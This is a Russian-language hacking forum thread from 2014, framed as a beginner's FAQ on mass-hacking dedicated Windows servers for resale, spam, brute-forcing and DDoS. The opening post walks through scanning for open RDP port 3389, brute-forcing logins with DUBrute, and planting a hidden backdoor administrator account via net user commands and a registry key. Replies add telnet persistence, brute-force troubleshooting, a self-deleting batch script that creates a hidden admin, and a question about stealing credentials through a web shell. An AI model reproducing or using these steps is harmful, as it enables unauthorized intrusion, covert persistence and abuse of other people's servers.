Авторские статьи [FAQ] Взлом дедиков

Discussion in 'Статьи' started by Shade, 6 Feb 2014.

  1. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    Доброе время суток.

    Делал эту статью около 2-3х лет назад. Но она не утратила свою актуальность и по сей день. Т.к в наше время парс дедов происходит именно так как описанно в этой статье.

    Подобные темы уже были на форуме, но здесь я буду говорить именно о массовом взломе дедов. (Например для продажи)

    Те кто знаком с опытом парса дедов, могут смело покинуть эту тему.

    Плюсы данной статьи является то что даже абсолютно нулевой новичек, не знающий что такое дедик, прочитав эту статью получит достаточные знания для парса деда итд.

    К данной статье прилагается видео.. ссылка будет в конце темы.

    Пожалуй начнем.


    Раздел первый (Что такое дедик, зачем он нужен?)

    Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
    служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.


    Как подключиться к дедику?

    Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика.

    Зачем нужен дедик???


    Ну к примеру для брута, флуда, спама icq, мыла, для Ddos. Приведу пример: Ты хочешь иметь красивый номер ICQ =) но не хочешь ставить брут на свой компьютер. Так как это долго, и слишком грузит твою машину. Для этого есть дед! Ставь брут на дедик, выключай свое железо, и иди гуляй. Возвращайся через несколько часов, и забирай свои красивенькие номера на здоровье!


    Где достать дедик?

    Есть несколько способов добыть дед

    1. Купить
    2. Взять на раздачах какого-либо форума
    3. Спарсить (сбрутить)
    4. Закинуть скрытый радмин(либо какой-либо батник на открытие портов) на машину юзера.

    Как залить файлы на дедик?

    Запакуй все файлы, весь софт в один архив, залей на файлообменик например: slil.ru, depositfiles. И другие. Возьми ссылку на скачивание, зайди в браузер дедика, и скачай всё своё добро на дед..

    Раздел второй (как маскироваться на дедике?)


    Для начала нужно создать нам свою учётку. Потому что если мы будем сидеть через учётку админа, то это 90% что он нас пропалит! А нам этого не надо! Итак читай внимательно как сделать на чужом дедике свою учётку, и скрыть её! Делать это мы будем через командную строку! Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней:

    Code:
    net user ([B]тут пишем логин и пароль учётки которую мы будем создовать! Делаем это через пробел.[/B])
    
    /add net localgroup Administrators ([B]Тут указываем имя которое вы должны были указать в первой строке[/B]) 
    
    /add net localgroup "Remote Desktop Users" ([B]Тут тоже указываем имя которое указали в строке выше)[/B] 
    
    /add net accounts /maxpwage:unlimited
    Допустим вы хотите создать учётную запись с именем admin, и паролем test. Тогда у вас должно вот что получиться:

    Code:
    net user [B]admin test[/B] /add
    net localgroup Administrators [B]admin[/B] /add
    net localgroup "Remote Desktop Users" [B]admin[/B] /add
    net accounts /maxpwage:unlimited
    Надеюсь понятно.
    Разберём каждую строку:

    Code:
    net user Имя_пользователя пароль /add - [COLOR=Green]Добавляет нового пользователя с указанным именем и паролем[/COLOR]
    
    net localgroup Administrators Имя_пользователя /add - [COLOR=Green]Добавляет нужного пользователя к группе администраторов[/COLOR]
    
    net localgroup "Remote Desktop Users" Имя_пользователя /add - [COLOR=Green]Добавляет нужного пользователя к группе удалённых пользоваелей[/COLOR]
    
    net accounts /maxpwage:unlimited - [COLOR=Green]позволяет избежать истечения срока действия пароля (14 дней)[/COLOR]
    Едем дальше. Тепрь нам нужно скрыть учётку чтобы она не была видна среди других пользователей. Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.
    Дальше нам нужно скрыть папку с нашим акком, со всеми подкатологами, и файлами. Для этого идём в Cocuments and Settings и скрываем там нашу папку. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить)
    Дальше идём в C:WINDOWSsystem32 и создаём папку (название любое) Но вот и всё теперь ты можешь спокойно заходить на дедик под своим логином, и паролем. Теперь после того как мы вошли под своим логином и паролем нужно скрыть папку которую мы сделали. Это делается правой кнопкой мыши.

    Раздел третий (Как брутить дедики)

    Вот и настало время для самого интересного раздела! Сейчас я вам буду рассказывать, как можно взламывать деды (брутить). Итак начнём.
    Нам понадобиться.
    1) Сканер я советую Angry ip Scanner (Этот сканер я использую сам)

    2) Брут я советую DUBrut (Этот брут я использую сам)

    3) Дед. Взять его вы сможете в любых раздачах дедов на форуме.

    Итак приступим. Заходим на дедик. Качаем сканер, и брут на дедик сохраняем в нашей папке. Запускаем сканер и настраиваем.

    1) Открываем сканер. И ставим порт 3389.

    2) выбираем диапазон ip

    3) Нажимаем "Start"
    Даллее у нас начнётся скан.

    После скана жмём File/Export all...
    И выбираем куда сохранить наши диапазоны.
    Со сканом мы закончили, теперь поработаем с брутом. Тепрь разархивируем брут на дедик. Создайте специальную папку для брута, а то будете путаться. Разархировали?

    Врубаем брут, заполняем все нужные нам поля в настройках (думаю писать о потоках итд не нужно).

    Брутить будем порсканий рванные айпи с открытым портом (3389), которые нам выдал наш скан..

    Нажимаем старт.
    Ждем пока пробрутится наш диапазон. Можете закрыть дедик и сходить погулять. После того как вы пришли с улицы заходим на дедик, и смотрим good.txt, и радуемся новыми дедиками.


    Раздел четвёртый (часто задаваемые вопросы)

    1. Вопрос: Почему я немогу подключиться к деду?

    Ответ: Скорей всего админ поменял пароль, или закрыл доступ к своему компьютеру, то есть закрыл порт 3389.

    2. Вопрос: Почему я не могу создать свою учётку на дедике?

    Ответ: Скорей всего вы попали на компьютер обычного пользователя (не администартора). А обычные пользователи не могут создовать учётки.

    3. Вопрос: Как узнать правильно ли я ввожу команды, для создания учётки?

    Ответ: Если у вас после каждой команды выходит надпись:

    Code:
    The command copleted successfully.

    Ну вот впринцепи и все.

    Я знаю что многие пункты можно было опустить.. но когда я писал эту статью, она была предназначена чисто для новичков.. чтоб каждый смог разобраться в этой небольшой, но интересной сфере. Надеюсь и вам понравилась моя статься..

    Видео по всему вышеописанному можно скачать тут >>> http://dfiles.ru/ru/files/7yp7chygo


    Всем спасибо за внимание с вами был Shade
     
    #1 Shade, 6 Feb 2014
    Last edited: 6 Feb 2014
  2. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    забыл добавить.. если вам дорог какой-либо дед, то можно открыть на нем порт телнета. чтоб всегда можно было его(дедик) вернуть.
     
  3. Miner_QRK

    Miner_QRK New Member

    Joined:
    9 Feb 2014
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    а можно по подробнее про данный порт?
     
  4. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Code:
    Как залить файлы на дедик?
    
     Запакуй все файлы, весь софт в один архив, залей на файлообменик например: slil.ru, depositfiles. И другие. Возьми ссылку на скачивание, зайди в браузер дедика, и скачай всё своё добро на дед..
    Какойто школьный способ

    В mstsc можно перед подключением расшарить нужный диск и его будет видно в "моём компьютере" на дедике
     
    binarymaster and zeoman like this.
  5. zeoman

    zeoman Member

    Joined:
    17 Jun 2010
    Messages:
    37
    Likes Received:
    43
    Reputations:
    43
    Давненько писал

    Всем привет , гулял по grabberz.com наткнулся на тему где человек хотел создать новую учетную запись через Telnet.

    [​IMG]

    Решил помочь и описать подробный способ по настройке сервера и клиента telnet.

    И так начнем , заходим на наш сервер , далее идем Пуск(Start) / Администрирование (Administrative tools) / Диспетчер серверов (Server manager) переходим во вкладку Особенности (Features)

    [​IMG]

    Там нажимаем Add Features , ставим галочку на Telnet server , нажимаем Next , Далее Install

    [​IMG]

    После установки нужно запустить службу telnet.

    1) Пуск(Start) / Администрирование (Administrative tools) / Службы (Services)
    2) Win + R -> services.msc

    Кликаем 2 раза по службе telnet в появившемся окне запускаем службу.

    [​IMG]

    И так Сервер telnet уже работает , теперь нам нужно добавить учетную запись в группу TelnetClients.

    [​IMG]

    Так настройка на сервере завершена , теперь займемся настройкой клиента Telnet - если у нас он уже не настроен , настройку я произвожу на Windows 7 , так как под рукой только она.
    Открываем консоль и пишем telnet , если telnet не настроен , то вы получите такоё сообщение как ниже на рисунке.

    [​IMG]

    Для настройки идем Пуск / Панель управления / Программы и компоненты /
    и выбираем Включение или отключение компонентов Windows , в появившемся окне ставим галочку на Клиент Telnet и нажимаем ОК.

    [​IMG]

    После завершения установки вновь открываем консоль и пишем telnet и получаем такой результат.

    [​IMG]

    Чтобы подключится к нашему серверу напишите команду o ip-дедика порт ( Стандартный порт telnet 23 ) , после подключения соглашаемся написав y.

    [​IMG]

    После подключения нас попросят ввести данные учетной записи - логин и пароль

    [​IMG]

    Жмем Enter все , теперь мы можешь создать учетную запись используя команду:

    net user логин пароль /add
    net localgroup Administrators логин /add
    net localgroup "Remote Desktop Users" логин /add
    net accounts /maxpwage:unlimited


    Получаем результат

    [​IMG]

    P.S. Работу телнет могут блокировать NAT , фаирвол и т.д

    © DServers.ru
     
    #5 zeoman, 25 Mar 2014
    Last edited: 25 Mar 2014
    stopxaker and OldOrion like this.
  6. Axiomatic

    Axiomatic New Member

    Joined:
    27 Mar 2014
    Messages:
    40
    Likes Received:
    3
    Reputations:
    0
    Инет днем/ночью 20/40 Мбит/сек
    В DUBrute APPS - выше 5 не поднимается ! Конфиг компа нормальный....
    В чем причина такой маленькой скорости перебора может быть ?

    // разобрался потоков мало по умолчанию стояло =)))
     
    #6 Axiomatic, 7 Apr 2014
    Last edited: 7 Apr 2014
  7. un1k0

    un1k0 New Member

    Joined:
    17 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Взял твою статью себе на сайт. Все копирайты проставил. Статью немного изменил(об этом написал)
    ссылка
    Если против - удалю)
     
  8. Alexan007

    Alexan007 Elder - Старейшина

    Joined:
    29 Jan 2010
    Messages:
    52
    Likes Received:
    10
    Reputations:
    13
    The specified target is unknown or unreachable

    Кто-нибудь знает как быть, если дед выдает "the specified target is unknown or unreachable"? винда 7
     
    #8 Alexan007, 26 Jun 2014
    Last edited: 28 Jun 2014
  9. =TOREDO=

    =TOREDO= New Member

    Joined:
    2 May 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    На каком этапе выдает такое сообщение?

    У меня такое было лишь когда дед был на линуксе
     
  10. Alexan007

    Alexan007 Elder - Старейшина

    Joined:
    29 Jan 2010
    Messages:
    52
    Likes Received:
    10
    Reputations:
    13
    После того как вводишь пароль и логин в форму, нет, эти деды они не на линуксе, обычно WinServer 2003, 2008
     
  11. fortinbras

    fortinbras New Member

    Joined:
    14 Nov 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Господа!
    Кто может подсказать, если при вводе
    net localgroup Administrators Имя_пользователя /add
    пишет, что указанной группы не существует.
    Какие возможные пути решения?
    Сервер российский
     
  12. zeoman

    zeoman Member

    Joined:
    17 Jun 2010
    Messages:
    37
    Likes Received:
    43
    Reputations:
    43
    Для ру сервера так

    net localgroup Администраторы Имя_пользователя /add
     
  13. fortinbras

    fortinbras New Member

    Joined:
    14 Nov 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо, zeoman!
    Парни, кто-то еще пользует DUBrut или есть в паблике что-то получше?
    У меня почему-то сходу все в Error падает. Или так и должно быть?
    Подскажите, плиз))
     
  14. Bikuz

    Bikuz New Member

    Joined:
    18 Sep 2012
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Я чет не понял, в файлик соурс в разделе [IP] что должно быть? Список IP такой:
    149.86.105.16
    149.86.105.17
    149.86.105.18
    И т.д.

    Или диапазон:
    149.86.105.16-149.87.105.16

    Как?
     
  15. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Это может быть из за плохого интернета и если много логинов и паролей из за того, что много подключений может кидать в Error у меня так же было я оставил наиболее используемые логины и пароли поставил меньше потоков и все стало нормально
    Если речь идет о генерации в бруте DUBrute туда нужно вносить ip адреса с открытыми портами для брута
    Если речь идет чекере например vnc scanner gui туда нужно вносить диапазоны
     
  16. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    143
    Likes Received:
    6
    Reputations:
    0
    Есть wso шелл на дедике (OC Windows), через консоль можно посмотреть списки файлов, а можно как нибудь добавить новый юзер и пароль или украсть логин пароля администратора?

    [​IMG] [​IMG]
     
  17. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    только если права позволяют
    добавить юзера 1 с паролем 2:
    Code:
    net user 1 2 /add
     
    Yargod and d4rk73rr0r like this.
  18. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    143
    Likes Received:
    6
    Reputations:
    0
    Спасибо, сделал как вы написали.
    net user логин пароль /add - Успешно выполнено
    net localgroup Administrators логин /add - не выполняются
    net localgroup "Remote Desktop Users" логин /add - не выполняются
    net accounts /maxpwage:unlimited - Успешно выполнено

    когда добавлю net localgroup Администраторы логин /add пишет, что указанной группы не существует, чтобы узнать группу пишу net localgroup на этот раз пишут
    Code:
    net localgroup 2>&1
    Системная ошибка 1312.
    
    Указанный сеанс работы не существует.  Возможно, он уже  завершен.
    Что посоветуйте ????
     
  19. maluw3250

    maluw3250 New Member

    Joined:
    12 Sep 2010
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    закинь ето все в батник
    Code:
    Set AdmGroupSID=S-1-5-32-544
    Set AdmGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
    Set AdmGroup=%AdmGroup:~0,-1%
    net user ADMINNAME PASSWORDADMIN /add
    net localgroup %AdmGroup% ADMINNAME /add
    Set RDPGroupSID=S-1-5-32-555
    Set RDPGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
    Set RDPGroup=%RDPGroup:~0,-1%
    net localgroup "%RDPGroup%" ADMINNAME /add
    net accounts /maxpwage:unlimited
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ADMINNAME /t REG_DWORD /d 0 /f
    pause
    del %0
    где
    ADMINNAME - логин админа
    PASSWORDADMIN - пароль админа
     
    binarymaster likes this.
  20. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    143
    Likes Received:
    6
    Reputations:
    0
    Здравствуйте ребята, извините за глупый вопрос. есть доступ на windows server 2012. как добавить новый админ через консоль? http://goo.gl/9BRIJg